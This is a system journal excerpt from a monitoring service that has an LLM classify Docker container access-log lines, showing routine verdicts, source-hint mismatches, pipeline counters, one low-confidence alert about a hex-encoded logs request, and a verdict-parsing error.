Mar 19 22:39:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:16.022271 [analyzer] Source hint mismatch: LLM says "docker/captain web API access log (application)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:18.872377 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:39:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:18.872415 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:21.747774 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:39:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:21.747810 [analyzer] Source hint mismatch: LLM says "docker container web/api access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:24.767101 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:39:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:24.767138 [analyzer] Source hint mismatch: LLM says "docker container access logs (app/http)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:26.095748 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:39:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:26.095780 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain service) / application access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:28.074089 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:39:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:28.074123 [analyzer] Source hint mismatch: LLM says "docker-captain web/app container access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:30.792110 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:39:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:30.792146 [analyzer] Source hint mismatch: LLM says "docker web/app container access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:33.883460 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:39:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:33.883497 [analyzer] Source hint mismatch: LLM says "docker:container http access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:36.163227 [observer] Pipeline: processed=743 pattern_hits=403 llm_calls=339 llm_errors=5 learned=1
Mar 19 22:39:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:36.163250 [observer] Patterns: hash=403 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=340
Mar 19 22:39:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:36.693285 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:39:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:36.693323 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / application web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:39.822238 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:39:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:39.822274 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:42.986341 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:39:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:42.986376 [analyzer] Source hint mismatch: LLM says "docker containerized web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:45.778097 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:39:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:45.778135 [analyzer] Source hint mismatch: LLM says "docker/captain container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:48.812531 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:39:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:48.812566 [analyzer] Source hint mismatch: LLM says "docker/captain web API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:51.808278 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:39:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:51.808312 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (app HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:54.734283 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:39:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:54.734320 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:57.649209 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:39:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:57.649245 [analyzer] Source hint mismatch: LLM says "docker/captain (container web/API access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:00.774659 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:40:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:00.774695 [analyzer] Source hint mismatch: LLM says "docker container access log / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:03.845270 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:40:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:03.845308 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (app HTTP access logging)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:06.164064 [observer] Pipeline: processed=767 pattern_hits=417 llm_calls=349 llm_errors=5 learned=1
Mar 19 22:40:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:06.164090 [observer] Patterns: hash=417 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=350
Mar 19 22:40:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:06.756956 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:40:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:06.756991 [analyzer] Source hint mismatch: LLM says "docker/captain container access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:09.826245 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:40:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:09.826278 [analyzer] Source hint mismatch: LLM says "docker container access log (app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:09.894456 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.90 action=allow pattern_type=prefix
Mar 19 22:40:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:09.894501 [analyzer] Source hint mismatch: LLM says "nginx (access log via docker)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:40:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:12.897577 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 19 22:40:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:12.897627 [analyzer] Source hint mismatch: LLM says "docker container (application web server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:15.780436 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:40:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:15.780473 [analyzer] Source hint mismatch: LLM says "docker/captain-web (access log / reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:18.651100 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.42 action=suppress pattern_type=prefix
Mar 19 22:40:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:18.651135 [analyzer] Source hint mismatch: LLM says "docker container web access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:21.726034 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 19 22:40:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:21.726069 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP GET to /api/v2/.../logs with encoding=hex may indicate log/telemetry retrieval; not clearly malicious but unusual enough to warrant scrutiny. Line=2026-03-19T22:40:20.602478056Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 21.155 ms - -
Mar 19 22:40:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:24.945488 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:40:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:24.945537 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:26.193005 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:40:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:26.193040 [analyzer] Source hint mismatch: LLM says "docker container web/app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:27.794497 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:40:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:27.794537 [analyzer] Source hint mismatch: LLM says "docker/captain web/API container (reverse proxy or app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:33.962928 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:40:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:33.962963 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log (captain app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:36.162968 [observer] Pipeline: processed=793 pattern_hits=433 llm_calls=359 llm_errors=5 learned=1
Mar 19 22:40:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:36.162991 [observer] Patterns: hash=433 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=360
Mar 19 22:40:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:42.766719 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:40:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:42.766757 [analyzer] Source hint mismatch: LLM says "docker/captain container access logs (web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:45.877313 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:40:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:45.877354 [analyzer] Source hint mismatch: LLM says "docker/captain container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:48.590367 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:40:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:48.590418 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (app HTTP access logs via container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:51.816982 [llm] Failed to parse verdict from: {
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   "classification": "safe",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   "confidence": 0.78,
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   "reason": "Appears to be a normal HTTP GET request to an application logs endpoint with a 304 status and routine latency.",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   "action": "allow",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   "pattern_type": "prefix",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   "pattern": "GET /api/v2/user/apps/appData/api/logs?encoding=hex",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   "source_hint": "docker-captain web service access log",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   "variable_fields": [
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "token": "2026-03-19T22:40:50.605577419Z",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "type": "timestamp",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "replacement": "<TS>"
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:     },
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "token": "304",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "type": "request_id",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "replacement": "<STATUS>"
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:     },
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "token": "21.852 ms",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "type": "duration",
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:       "replacement": "<DUR>"
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:     }
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]:   ]
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:51.817030 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal
Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:51.817040 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:40:50.605577419Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:40:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:54.729935 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:40:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:54.729975 [analyzer] Source hint mismatch: LLM says "docker container access log (application/API server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:40:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:57.850733 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:40:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:57.850769 [analyzer] Source hint mismatch: LLM says "docker container access logs / reverse proxy (e.g., app/http server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:00.900153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:41:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:00.900217 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (web app access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:03.823257 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:41:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:03.823300 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (app HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:06.163113 [observer] Pipeline: processed=816 pattern_hits=447 llm_calls=368 llm_errors=6 learned=1
Mar 19 22:41:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:06.163139 [observer] Patterns: hash=447 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=1 misses=369
Mar 19 22:41:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:06.665301 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:41:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:06.665335 [analyzer] Source hint mismatch: LLM says "docker http access log (app behind container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:09.750694 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:41:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:09.750731 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log (app/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:12.924904 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains
Mar 19 22:41:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:12.924944 [analyzer] Source hint mismatch: LLM says "docker/captain (containerized web API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:15.884606 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:41:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:15.884643 [analyzer] Source hint mismatch: LLM says "docker container access logger / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:18.867866 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:41:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:18.867905 [analyzer] Source hint mismatch: LLM says "dockerized web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:21.757341 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:41:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:21.757379 [analyzer] Source hint mismatch: LLM says "docker container (app web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:24.775624 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:41:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:24.775681 [analyzer] Source hint mismatch: LLM says "docker container access log (web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:25.868570 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:41:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:25.868622 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web application access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:27.841681 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:41:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:27.841731 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) likely serving an HTTP API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:31.023680 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:41:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:31.023718 [analyzer] Source hint mismatch: LLM says "docker/captain container web access log (API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:33.707603 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:41:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:33.707657 [analyzer] Source hint mismatch: LLM says "docker/captain web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:36.162952 [observer] Pipeline: processed=841 pattern_hits=461 llm_calls=379 llm_errors=6 learned=1
Mar 19 22:41:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:36.162977 [observer] Patterns: hash=461 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=1 misses=380
Mar 19 22:41:37 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:37.054484 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:41:37 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:37.054519 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / application access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:39.758006 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:41:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:39.758043 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:42.833821 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:41:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:42.833858 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (web/API container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:45.838658 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:41:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:45.838689 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:48.856553 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:41:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:48.856588 [analyzer] Source hint mismatch: LLM says "docker container reverse-proxy/app logs endpoint", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:41:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:51.907954 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
